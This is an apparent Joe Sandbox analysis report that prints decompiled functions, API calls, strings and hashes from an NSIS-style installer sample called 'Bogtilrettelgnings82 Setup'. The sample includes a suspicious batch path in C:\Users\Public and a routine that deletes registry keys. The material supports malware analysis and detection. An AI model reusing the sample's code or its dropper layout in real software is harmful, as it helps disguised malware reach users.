                                                                      • Instruction ID: 2b7602dd897122490efce7636127cf141f752ce9b4a01bbcaa67e469b6673d4c
                                                                      • Opcode Fuzzy Hash: 74fb76eeeede5a40a20a2361ef673ad81c0513ff9195b193d02cf5d9451a49b8
                                                                      • Instruction Fuzzy Hash: 1C01C4B094A214ABE721AF60AF0DEAE776CBB01701B144137F501B12E1C2B8E941C69E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404894 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404894(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                      0x004048a2
                                                                      0x004048af
                                                                      0x004048b5
                                                                      0x004048f3
                                                                      0x004048f3
                                                                      0x00404902
                                                                      0x00404909
                                                                      0x00000000
                                                                      0x0040490b
                                                                      0x004048b7
                                                                      0x004048c6
                                                                      0x004048ce
                                                                      0x004048d1
                                                                      0x004048e3
                                                                      0x004048e9
                                                                      0x004048f0
                                                                      0x00000000
                                                                      0x004048f0
                                                                      0x00000000

                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048AF
                                                                      • GetMessagePos.USER32 ref: 004048B7
                                                                      • ScreenToClient.USER32 ref: 004048D1
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048E3
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404909
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                      • Instruction ID: 496b0d989960c3cf29f9699654413807f08c541ba74c601a1343b1cc24abed90
                                                                      • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                      • Instruction Fuzzy Hash: A9015275D00219BAEB11DBA4DC45FFFBBBCAF55711F10412BBA10B61C0C7B4A5418BA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402B42(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BBE();
					_t19 = "unpacking data: %d%%";
					if( *0x4236f0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                      0x00402b4f
                                                                      0x00402b5d
                                                                      0x00402b63
                                                                      0x00402b63
                                                                      0x00402b71
                                                                      0x00402b73
                                                                      0x00402b7f
                                                                      0x00402b84
                                                                      0x00402b86
                                                                      0x00402b86
                                                                      0x00402b91
                                                                      0x00402ba1
                                                                      0x00402bb3
                                                                      0x00402bb3
                                                                      0x00402bbb

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                      • API String ID: 1451636040-1158693248
                                                                      • Opcode ID: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                                      • Instruction ID: 1e30126d7328232efec95edeb0659339e9715d7a4c2dcddc2072aaf334070cd4
                                                                      • Opcode Fuzzy Hash: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                                      • Instruction Fuzzy Hash: EBF01270900108BBDF215F61CD0ABEE3779EB10345F00803AFA06B51D0D7F8AA558B99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004047B2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 51%
                                                                      			E004047B2(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405D00(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405D00(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405D00(_t34, 0, 0x41fce0, 0x41fce0, _a8);
				wsprintfA(_t26 + lstrlenA(0x41fce0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x422eb8, _a4, 0x41fce0);
			}













                                                                      0x004047ba
                                                                      0x004047be
                                                                      0x004047c6
                                                                      0x004047c9
                                                                      0x004047ca
                                                                      0x004047cc
                                                                      0x004047ce
                                                                      0x004047d1
                                                                      0x004047d1
                                                                      0x004047d8
                                                                      0x004047de
                                                                      0x004047de
                                                                      0x004047e5
                                                                      0x004047f0
                                                                      0x004047f1
                                                                      0x004047f4
                                                                      0x004047f4
                                                                      0x00404801
                                                                      0x0040480c
                                                                      0x0040480f
                                                                      0x00404821
                                                                      0x00404828
                                                                      0x00404829
                                                                      0x00404838
                                                                      0x00404848
                                                                      0x00404864

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Bogtilrettelgnings82 Setup: Installing,Bogtilrettelgnings82 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046D2,000000DF,0000040F,00000400,00000000), ref: 00404840
                                                                      • wsprintfA.USER32 ref: 00404848
                                                                      • SetDlgItemTextA.USER32 ref: 0040485B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s$Bogtilrettelgnings82 Setup: Installing
                                                                      • API String ID: 3540041739-1008884453
                                                                      • Opcode ID: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                                      • Instruction ID: ac025ec359353314cc5270af0c4b085ff7d14dcca326c3d749765100b4f994c7
                                                                      • Opcode Fuzzy Hash: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                                      • Instruction Fuzzy Hash: 2F11E27360012437DB00626D9C4AFEF3659DBC2334F24423BFA29B71D1E9789C6282E9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403A2C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403A2C(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C55(__ecx, "1033");
				while(1) {
					_t26 =  *0x423724;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x4236f0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423720;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x422ec0 = _t18[1];
					 *0x423788 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x422ebc = _t23;
						E00405C3C(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x41fcc0, E00405D00(_t13, _t24, _t26, "Bogtilrettelgnings82 Setup", 0xfffffffe));
						_t11 =  *0x42370c;
						_t27 =  *0x423708;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D00(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                      0x00403a30
                                                                      0x00403a35
                                                                      0x00403a3b
                                                                      0x00403a40
                                                                      0x00403a40
                                                                      0x00403a48
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403a50
                                                                      0x00403a58
                                                                      0x00403a5a
                                                                      0x00403a60
                                                                      0x00403a60
                                                                      0x00403a62
                                                                      0x00403a6e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403a72
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403a74
                                                                      0x00403a79
                                                                      0x00403a82
                                                                      0x00403a88
                                                                      0x00403a8d
                                                                      0x00403aa1
                                                                      0x00403aac
                                                                      0x00403ac4
                                                                      0x00403aca
                                                                      0x00403acf
                                                                      0x00403ad7
                                                                      0x00403af8
                                                                      0x00403af8
                                                                      0x00403af8
                                                                      0x00403ad9
                                                                      0x00403adb
                                                                      0x00403adb
                                                                      0x00403adf
                                                                      0x00403ae6
                                                                      0x00403ae6
                                                                      0x00403aeb
                                                                      0x00403af1
                                                                      0x00403af1
                                                                      0x00000000
                                                                      0x00403adb
                                                                      0x00403a8f
                                                                      0x00403a94
                                                                      0x00403a9d
                                                                      0x00403a96
                                                                      0x00403a96
                                                                      0x00403a96
                                                                      0x00403a94

                                                                      APIs
                                                                      • SetWindowTextA.USER32(00000000,Bogtilrettelgnings82 Setup), ref: 00403AC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID: "C:\Users\Public\iqb3.bat" $1033$Bogtilrettelgnings82 Setup$Bogtilrettelgnings82 Setup: Installing
                                                                      • API String ID: 530164218-933009727
                                                                      • Opcode ID: 7da43f0c514d78443db1c9c9eeb4ba8c9d941e0bb92036ebee77233e000656fa
                                                                      • Instruction ID: f1b991f97094af788ebc2fc7f50f41b17603f103b5ffb0c1ba3ee096011c9b45
                                                                      • Opcode Fuzzy Hash: 7da43f0c514d78443db1c9c9eeb4ba8c9d941e0bb92036ebee77233e000656fa
                                                                      • Instruction Fuzzy Hash: DE11D1B1B04611ABCB20DF55DC80A377BADEB84716369813FE941A7391C63D9D029EA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1000182A Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 97%
                                                                      			E1000182A(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v148;
				void _t46;
				void _t47;
				signed int _t48;
				signed int _t49;
				signed int _t58;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t78;
				void* _t82;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				void* _t102;

				_t86 = __edx;
				 *0x1000405c = _a8;
				_t78 = 0;
				 *0x10004060 = _a16;
				_v8 = 0;
				_a16 = E1000123B();
				_a8 = E1000123B();
				_t91 = E1000131B(_a16);
				_t82 = _a8;
				_t88 = _t86;
				_t46 =  *_t82;
				if(_t46 != 0x7e && _t46 != 0x21) {
					_v16 = E1000123B();
					_t78 = E1000131B(_t75);
					_v8 = _t86;
					GlobalFree(_v16);
					_t82 = _a8;
				}
				_t47 =  *_t82;
				_t102 = _t47 - 0x2f;
				if(_t102 > 0) {
					_t48 = _t47 - 0x3c;
					__eflags = _t48;
					if(_t48 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3c;
						if( *((char*)(_t82 + 1)) != 0x3c) {
							__eflags = _t88 - _v8;
							if(__eflags > 0) {
								L54:
								_t49 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t91 = _t49;
								_t88 = _t86;
								L57:
								E10001446(_t86, _t91, _t88,  &_v148);
								E10001278( &_v148);
								GlobalFree(_a16);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t49 = 1;
								goto L55;
							}
							__eflags = _t91 - _t78;
							if(_t91 < _t78) {
								goto L47;
							}
							goto L54;
						}
						_t86 = _t88;
						_t49 = E10002CF0(_t91, _t78, _t86);
						goto L56;
					}
					_t58 = _t48 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags = _t91 - _t78;
						if(_t91 != _t78) {
							goto L54;
						}
						__eflags = _t88 - _v8;
						if(_t88 != _v8) {
							goto L54;
						}
						goto L47;
					}
					_t59 = _t58 - 1;
					__eflags = _t59;
					if(_t59 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3e;
						if( *((char*)(_t82 + 1)) != 0x3e) {
							__eflags = _t88 - _v8;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t91 - _t78;
							if(_t91 <= _t78) {
								goto L54;
							}
							goto L47;
						}
						_t86 = _t88;
						_t49 = E10002D10(_t91, _t78, _t86);
						goto L56;
					}
					_t61 = _t59 - 0x20;
					__eflags = _t61;
					if(_t61 == 0) {
						_t91 = _t91 ^ _t78;
						_t88 = _t88 ^ _v8;
						goto L57;
					}
					_t62 = _t61 - 0x1e;
					__eflags = _t62;
					if(_t62 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x7c;
						if( *((char*)(_t82 + 1)) != 0x7c) {
							_t91 = _t91 | _t78;
							_t88 = _t88 | _v8;
							goto L57;
						}
						__eflags = _t91 | _t88;
						if((_t91 | _t88) != 0) {
							goto L47;
						}
						__eflags = _t78 | _v8;
						if((_t78 | _v8) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t62 == 0;
					if(_t62 == 0) {
						_t91 =  !_t91;
						_t88 =  !_t88;
					}
					goto L57;
				}
				if(_t102 == 0) {
					L21:
					__eflags = _t78 | _v8;
					if((_t78 | _v8) != 0) {
						_v20 = E10002B80(_t91, _t88, _t78, _v8);
						_v16 = _t86;
						_t49 = E10002C30(_t91, _t88, _t78, _v8);
						_t82 = _a8;
					} else {
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_t49 = _t91;
						_t86 = _t88;
					}
					__eflags =  *_t82 - 0x2f;
					if( *_t82 != 0x2f) {
						goto L56;
					} else {
						_t91 = _v20;
						_t88 = _v16;
						goto L57;
					}
				}
				_t68 = _t47 - 0x21;
				if(_t68 == 0) {
					_t49 = 0;
					__eflags = _t91 | _t88;
					if((_t91 | _t88) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t69 = _t68 - 4;
				if(_t69 == 0) {
					goto L21;
				}
				_t70 = _t69 - 1;
				if(_t70 == 0) {
					__eflags =  *((char*)(_t82 + 1)) - 0x26;
					if( *((char*)(_t82 + 1)) != 0x26) {
						_t91 = _t91 & _t78;
						_t88 = _t88 & _v8;
						goto L57;
					}
					__eflags = _t91 | _t88;
					if((_t91 | _t88) == 0) {
						goto L54;
					}
					__eflags = _t78 | _v8;
					if((_t78 | _v8) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t71 = _t70 - 4;
				if(_t71 == 0) {
					_t49 = E10002B40(_t91, _t88, _t78, _v8);
					goto L56;
				} else {
					_t72 = _t71 - 1;
					if(_t72 == 0) {
						_t91 = _t91 + _t78;
						asm("adc edi, [ebp-0x4]");
					} else {
						if(_t72 == 0) {
							_t91 = _t91 - _t78;
							asm("sbb edi, [ebp-0x4]");
						}
					}
					goto L57;
				}
			}


























                                                                      0x1000182a
                                                                      0x10001837
                                                                      0x10001840
                                                                      0x10001843
                                                                      0x10001848
                                                                      0x10001850
                                                                      0x1000185b
                                                                      0x10001864
                                                                      0x10001866
                                                                      0x10001869
                                                                      0x1000186b
                                                                      0x1000186f
                                                                      0x1000187b
                                                                      0x10001884
                                                                      0x10001889
                                                                      0x1000188c
                                                                      0x10001892
                                                                      0x10001892
                                                                      0x10001895
                                                                      0x10001898
                                                                      0x1000189b
                                                                      0x10001961
                                                                      0x10001961
                                                                      0x10001964
                                                                      0x100019cd
                                                                      0x100019d1
                                                                      0x100019e0
                                                                      0x100019e3
                                                                      0x100019eb
                                                                      0x100019eb
                                                                      0x100019eb
                                                                      0x100019ed
                                                                      0x100019ed
                                                                      0x100019ee
                                                                      0x100019ee
                                                                      0x100019f0
                                                                      0x100019f2
                                                                      0x100019fb
                                                                      0x10001a07
                                                                      0x10001a18
                                                                      0x10001a23
                                                                      0x10001a23
                                                                      0x100019e5
                                                                      0x100019c8
                                                                      0x100019c8
                                                                      0x100019ca
                                                                      0x100019ca
                                                                      0x00000000
                                                                      0x100019ca
                                                                      0x100019e7
                                                                      0x100019e9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100019e9
                                                                      0x100019d5
                                                                      0x100019d9
                                                                      0x00000000
                                                                      0x100019d9
                                                                      0x10001966
                                                                      0x10001966
                                                                      0x10001967
                                                                      0x100019bf
                                                                      0x100019c1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100019c3
                                                                      0x100019c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100019c6
                                                                      0x10001969
                                                                      0x10001969
                                                                      0x1000196a
                                                                      0x1000199f
                                                                      0x100019a3
                                                                      0x100019b2
                                                                      0x100019b5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100019b7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100019b9
                                                                      0x100019bb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100019bd
                                                                      0x100019a7
                                                                      0x100019ab
                                                                      0x00000000
                                                                      0x100019ab
                                                                      0x1000196c
                                                                      0x1000196c
                                                                      0x1000196f
                                                                      0x10001998
                                                                      0x1000199a
                                                                      0x00000000
                                                                      0x1000199a
                                                                      0x10001971
                                                                      0x10001971
                                                                      0x10001974
                                                                      0x10001980
                                                                      0x10001984
                                                                      0x10001991
                                                                      0x10001993
                                                                      0x00000000
                                                                      0x10001993
                                                                      0x10001986
                                                                      0x10001988
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000198a
                                                                      0x1000198d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000198f
                                                                      0x10001977
                                                                      0x10001978
                                                                      0x1000197a
                                                                      0x1000197c
                                                                      0x1000197c
                                                                      0x00000000
                                                                      0x10001978
                                                                      0x100018a1
                                                                      0x10001919
                                                                      0x1000191b
                                                                      0x1000191e
                                                                      0x1000193c
                                                                      0x1000193f
                                                                      0x10001945
                                                                      0x1000194a
                                                                      0x10001920
                                                                      0x10001920
                                                                      0x10001924
                                                                      0x10001928
                                                                      0x1000192a
                                                                      0x1000192a
                                                                      0x1000194d
                                                                      0x10001950
                                                                      0x00000000
                                                                      0x10001956
                                                                      0x10001956
                                                                      0x10001959
                                                                      0x00000000
                                                                      0x10001959
                                                                      0x10001950
                                                                      0x100018a3
                                                                      0x100018a6
                                                                      0x1000190a
                                                                      0x1000190c
                                                                      0x1000190e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001914
                                                                      0x100018a8
                                                                      0x100018ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100018ad
                                                                      0x100018ae
                                                                      0x100018e4
                                                                      0x100018e8
                                                                      0x10001900
                                                                      0x10001902
                                                                      0x00000000
                                                                      0x10001902
                                                                      0x100018ea
                                                                      0x100018ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100018f2
                                                                      0x100018f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100018fb
                                                                      0x100018b0
                                                                      0x100018b3
                                                                      0x100018da
                                                                      0x00000000
                                                                      0x100018b5
                                                                      0x100018b5
                                                                      0x100018b6
                                                                      0x100018ca
                                                                      0x100018cc
                                                                      0x100018b8
                                                                      0x100018ba
                                                                      0x100018c0
                                                                      0x100018c2
                                                                      0x100018c2
                                                                      0x100018ba
                                                                      0x00000000
                                                                      0x100018b6

                                                                      APIs
                                                                        • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                                        • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                      • GlobalFree.KERNEL32 ref: 1000188C
                                                                      • GlobalFree.KERNEL32 ref: 10001A18
                                                                      • GlobalFree.KERNEL32 ref: 10001A1D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.757682389.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.757659819.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757713257.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757732274.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal$lstrcpy
                                                                      • String ID:
                                                                      • API String ID: 176019282-0
                                                                      • Opcode ID: 005973ac7ef1aad3e32af9e663bee20bd7d28a1ea40780e3a2324aca203f840c
                                                                      • Instruction ID: 002a9f38c559984e9ec1427774ff2aecdab259683a6adff3edf0c49f5852233b
                                                                      • Opcode Fuzzy Hash: 005973ac7ef1aad3e32af9e663bee20bd7d28a1ea40780e3a2324aca203f840c
                                                                      • Instruction Fuzzy Hash: C951D332D04159AAFB21DFE4C8A16EEBBF5EB443D0F22416AE805E311DC635AF01DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E00402A3D(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423790 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A3D(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406009(2);
					if(_t27 == 0) {
						if( *0x423790 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423790, 0);
				}
				return _t18;
			}








                                                                      0x00402a5e
                                                                      0x00402a66
                                                                      0x00402a8e
                                                                      0x00402a78
                                                                      0x00402ac8
                                                                      0x00402ace
                                                                      0x00000000
                                                                      0x00402ad0
                                                                      0x00402a8c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402a8c
                                                                      0x00402aa3
                                                                      0x00402aab
                                                                      0x00402ab2
                                                                      0x00402ade
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402ae6
                                                                      0x00402aee
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402aee
                                                                      0x00000000
                                                                      0x00402ac1
                                                                      0x00402ad5

                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
